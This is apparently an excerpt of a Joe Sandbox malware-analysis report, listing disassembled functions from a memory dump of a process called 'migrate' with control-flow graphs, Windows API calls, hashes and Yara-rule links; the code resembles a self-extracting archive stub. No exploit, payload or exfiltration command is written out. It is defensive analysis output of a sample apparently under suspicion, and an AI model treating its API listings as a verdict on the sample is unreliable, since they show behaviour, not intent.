                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                                                                                                                                                    • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                                                                                                                                                    • API String ID: 2141747552-1753850145
                                                                                                                                                                                                    • Opcode ID: 307dc85385ead8036a1e88c86cd540b7311aa80f65eb4673376c0b3ffe902e13
                                                                                                                                                                                                    • Instruction ID: 9f26c5a24f1b656696a8bc80d0d560f8f7212bfac2051d7a23d1655e4929168e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 307dc85385ead8036a1e88c86cd540b7311aa80f65eb4673376c0b3ffe902e13
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B9E086749507119EC7219F38984DB42BAD46F15700F24882DF0FAD3A60D7B4D5C18B50
                                                                                                                                                                                                    Function 001198E0 Relevance: 7.6, APIs: 5, Instructions: 111filetimeCOMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 1004 1198e0-119901 call 12ec50 1007 119903-119906 1004->1007 1008 11990c 1004->1008 1007->1008 1010 119908-11990a 1007->1010 1009 11990e-11991f 1008->1009 1011 119921 1009->1011 1012 119927-119931 1009->1012 1010->1009 1011->1012 1013 119933 1012->1013 1014 119936-119943 call 116edb 1012->1014 1013->1014 1017 119945 1014->1017 1018 11994b-11996a CreateFileW 1014->1018 1017->1018 1019 1199bb-1199bf 1018->1019 1020 11996c-11998e GetLastError call 11bb03 1018->1020 1022 1199c3-1199c6 1019->1022 1024 1199c8-1199cd 1020->1024 1029 119990-1199b3 CreateFileW GetLastError 1020->1029 1023 1199d9-1199de 1022->1023 1022->1024 1027 1199e0-1199e3 1023->1027 1028 1199ff-119a10 1023->1028 1024->1023 1026 1199cf 1024->1026 1026->1023 1027->1028 1030 1199e5-1199f9 SetFileTime 1027->1030 1031 119a12-119a2a call 120602 1028->1031 1032 119a2e-119a39 1028->1032 1029->1022 1033 1199b5-1199b9 1029->1033 1030->1028 1031->1032 1033->1022
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00117760,?,00000005,?,00000011), ref: 0011995F
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00117760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0011996C
                                                                                                                                                                                                    • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00117760,?,00000005,?), ref: 001199A2
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00117760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 001199AA
                                                                                                                                                                                                    • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00117760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 001199F9
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$CreateErrorLast$Time
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1999340476-0
                                                                                                                                                                                                    • Opcode ID: fe8d640fc88a2cd72e522a1f41fb243128279a5b8efbbbdf79dda5ef99a446a8
                                                                                                                                                                                                    • Instruction ID: 3887577a387f4f8316ccea60352f174f75a8d05d0fecf77a38ada64f3a0264b5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fe8d640fc88a2cd72e522a1f41fb243128279a5b8efbbbdf79dda5ef99a446a8
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BD3124305443896FE7349F24CC46BDABBE8BB05328F200B29F9B1961D1D3B4A9D4CB91
                                                                                                                                                                                                    Function 0012B568 Relevance: 7.5, APIs: 5, Instructions: 38windowCOMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 1063 12b568-12b581 PeekMessageW 1064 12b583-12b597 GetMessageW 1063->1064 1065 12b5bc-12b5be 1063->1065 1066 12b5a8-12b5b6 TranslateMessage DispatchMessageW 1064->1066 1067 12b599-12b5a6 IsDialogMessageW 1064->1067 1066->1065 1067->1065 1067->1066
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0012B579
                                                                                                                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0012B58A
                                                                                                                                                                                                    • IsDialogMessageW.USER32(000801EA,?), ref: 0012B59E
                                                                                                                                                                                                    • TranslateMessage.USER32(?), ref: 0012B5AC
                                                                                                                                                                                                    • DispatchMessageW.USER32(?), ref: 0012B5B6
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Message$DialogDispatchPeekTranslate
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1266772231-0
                                                                                                                                                                                                    • Opcode ID: bd24cffbc6896265f67d3a180299f4bc3e20163d51c68f64514a4f86a0208297
                                                                                                                                                                                                    • Instruction ID: 3e928849578770039cc72c4d915652807f0b2f1964a2c02e1176ab4ed6994c79
                                                                                                                                                                                                    • Opcode Fuzzy Hash: bd24cffbc6896265f67d3a180299f4bc3e20163d51c68f64514a4f86a0208297
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 26F0D071A0122AAB8B209BE5EC4CDDF7FBCEF053917404415B919D2410EB34D685DBF0
                                                                                                                                                                                                    Function 0012ABAB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 1068 12abab-12abca GetClassNameW 1069 12abf2-12abf4 1068->1069 1070 12abcc-12abe1 call 121fbb 1068->1070 1072 12abf6-12abf9 SHAutoComplete 1069->1072 1073 12abff-12ac01 1069->1073 1075 12abe3-12abef FindWindowExW 1070->1075 1076 12abf1 1070->1076 1072->1073 1075->1076 1076->1069
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetClassNameW.USER32(?,?,00000050), ref: 0012ABC2
                                                                                                                                                                                                    • SHAutoComplete.SHLWAPI(?,00000010), ref: 0012ABF9
                                                                                                                                                                                                      • Part of subcall function 00121FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0011C116,00000000,.exe,?,?,00000800,?,?,?,00128E3C), ref: 00121FD1
                                                                                                                                                                                                    • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0012ABE9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                                                                                                                                    • String ID: EDIT
                                                                                                                                                                                                    • API String ID: 4243998846-3080729518
                                                                                                                                                                                                    • Opcode ID: 0bdc48540389669f2cd18ebfaa875a921da5b0eb3beef44421a90270c3c025b6
                                                                                                                                                                                                    • Instruction ID: ccfea15b420f6d05086f77ced0baa1f783dd50d305a4447c5e77dd0e7cd4dca3
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0bdc48540389669f2cd18ebfaa875a921da5b0eb3beef44421a90270c3c025b6
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 45F0823260023877DB20A624AC09F9B767C9F46B40F484021BA05F2180D765DE95C5B6
                                                                                                                                                                                                    Function 0012DBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31COMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 1077 12dbde-12dc12 call 12ec50 SetEnvironmentVariableW call 120371 1082 12dc36-12dc38 1077->1082 1083 12dc14-12dc18 1077->1083 1084 12dc21-12dc28 call 12048d 1083->1084 1087 12dc1a-12dc20 1084->1087 1088 12dc2a-12dc30 SetEnvironmentVariableW 1084->1088 1087->1084 1088->1082
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 0012DBF4
                                                                                                                                                                                                    • SetEnvironmentVariableW.KERNELBASE(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0012DC30
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: EnvironmentVariable
                                                                                                                                                                                                    • String ID: sfxcmd$sfxpar
                                                                                                                                                                                                    • API String ID: 1431749950-3493335439
                                                                                                                                                                                                    • Opcode ID: e4afa2cc75f66de6f52519024a3004096c8dc2a07b373c946c1081514c722f0f
                                                                                                                                                                                                    • Instruction ID: 758e29943da07bc894bf240669696a7e2cac8b6fdd1f8cb53a7bf1b926a2c632
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e4afa2cc75f66de6f52519024a3004096c8dc2a07b373c946c1081514c722f0f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 57F0EC724042346BCB212FD4FC06BFA3B58AF15F81B040415BD8995162D7B089A0D6B0
                                                                                                                                                                                                    Function 00119785 Relevance: 6.1, APIs: 4, Instructions: 56fileCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00119795
                                                                                                                                                                                                    • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 001197AD
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 001197DF
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 001197FE
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorLast$FileHandleRead
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2244327787-0
                                                                                                                                                                                                    • Opcode ID: a4c6a121cb28230b1459e27a217a8fee6084b92d0a4d689b89ac891c6d7c3a8f
                                                                                                                                                                                                    • Instruction ID: 39d8bb4da885715b5924babc10e2c3c9f7563c7f3729cf72a80530972c6b3175
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a4c6a121cb28230b1459e27a217a8fee6084b92d0a4d689b89ac891c6d7c3a8f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5B11CE34910208EBCF285F24C814AE937A9FF12720F108A39F436865D0D7709EC4DF61
                                                                                                                                                                                                    Function 0013AD34 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,001340EF,00000000,00000000,?,0013ACDB,001340EF,00000000,00000000,00000000,?,0013AED8,00000006,FlsSetValue), ref: 0013AD66
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,0013ACDB,001340EF,00000000,00000000,00000000,?,0013AED8,00000006,FlsSetValue,00147970,FlsSetValue,00000000,00000364,?,001398B7), ref: 0013AD72
                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0013ACDB,001340EF,00000000,00000000,00000000,?,0013AED8,00000006,FlsSetValue,00147970,FlsSetValue,00000000), ref: 0013AD80
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3177248105-0
                                                                                                                                                                                                    • Opcode ID: e05b3181c12ccc26099f53c6fdc03976570603178372a4ab7f74de28a4f8521a
                                                                                                                                                                                                    • Instruction ID: ca97607bfd33ea1fe409ffbbfe94b2e18562fe2089f26fd79c26adc508e71c69
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e05b3181c12ccc26099f53c6fdc03976570603178372a4ab7f74de28a4f8521a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 82012B3A201232ABC7214FA8DC48E577FACEF067A3F510724F99AD3960D720D841C6E1
                                                                                                                                                                                                    Function 0011F344 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 0011F2C5: GetProcAddress.KERNELBASE(00000000,CryptProtectMemory), ref: 0011F2E4
                                                                                                                                                                                                      • Part of subcall function 0011F2C5: GetProcAddress.KERNEL32(001581C8,CryptUnprotectMemory), ref: 0011F2F4
                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(?,?,?,0011F33E), ref: 0011F3D2
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • CryptProtectMemory failed, xrefs: 0011F389
                                                                                                                                                                                                    • CryptUnprotectMemory failed, xrefs: 0011F3CA
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressProc$CurrentProcess
                                                                                                                                                                                                    • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                                                                                                                                                    • API String ID: 2190909847-396321323
                                                                                                                                                                                                    • Opcode ID: 759bc676223e559760248ee47fc456b8a2ac66b3b51df9e7eb9044dc730d5543
                                                                                                                                                                                                    • Instruction ID: a9eb4535bf03806cf039299ff5b15ee0896a341afc97efd01100c90abd54418a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 759bc676223e559760248ee47fc456b8a2ac66b3b51df9e7eb9044dc730d5543
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2D11B131601629ABDF19AF20D845AAE3754FF40760B14413AFC61AF2A1DB709EC2C792
                                                                                                                                                                                                    Function 0012101F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CreateThread.KERNELBASE(00000000,00010000,Function_00011160,?,00000000,00000000), ref: 00121043
                                                                                                                                                                                                    • SetThreadPriority.KERNEL32(?,00000000), ref: 0012108A
                                                                                                                                                                                                      • Part of subcall function 00116C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00116C54
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Thread$CreatePriority__vswprintf_c_l
                                                                                                                                                                                                    • String ID: CreateThread failed
                                                                                                                                                                                                    • API String ID: 2655393344-3849766595
                                                                                                                                                                                                    • Opcode ID: 32ba7e08a103d8da361bd479a9ddde4b5f2dd8f2c8bf668c958e1ab7da783ab6
                                                                                                                                                                                                    • Instruction ID: c6a53ce7afa2502b7131d51da303a9d56ab78eced54ee1cb89a27893d81b0a98
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 32ba7e08a103d8da361bd479a9ddde4b5f2dd8f2c8bf668c958e1ab7da783ab6
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8E0126B5304319BFD3389F64BC51BB673A9EB60752F20002EFA82571C0CBA168C48224
                                                                                                                                                                                                    Function 00119F7A Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F5,?,?,?,?,0011D343,00000001,?,?,?,00000000,0012551D,?,?,?), ref: 00119F9E
                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,0012551D,?,?,?,?,?,00124FC7,?), ref: 00119FE5
                                                                                                                                                                                                    • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,0011D343,00000001,?,?), ref: 0011A011
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FileWrite$Handle
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4209713984-0
                                                                                                                                                                                                    • Opcode ID: 91d467c3ce5e5e9c1f140043a5d2de1b70ab8bbca1ebdfab4afed37fd3f559ca
                                                                                                                                                                                                    • Instruction ID: eb53e37f3affb95622d83eaad6301d45ed557de64b8e1858bf2549e10d97e78c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 91d467c3ce5e5e9c1f140043a5d2de1b70ab8bbca1ebdfab4afed37fd3f559ca
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C131D331205306AFDB18CF20D828BAE7BA5FF85715F00062DF9519B290C7759DC9CBA2
                                                                                                                                                                                                    Function 0011A2B2 Relevance: 4.6, APIs: 3, Instructions: 55COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 0011C27E: _wcslen.LIBCMT ref: 0011C284
                                                                                                                                                                                                    • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0011A175,?,00000001,00000000,?,?), ref: 0011A2D9
                                                                                                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0011A175,?,00000001,00000000,?,?), ref: 0011A30C
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,0011A175,?,00000001,00000000,?,?), ref: 0011A329
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CreateDirectory$ErrorLast_wcslen
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2260680371-0
                                                                                                                                                                                                    • Opcode ID: 37fbf3aa51f9364c3085eb74811a1a7b05ab4396a9b6be34bae7e566ccea6b55
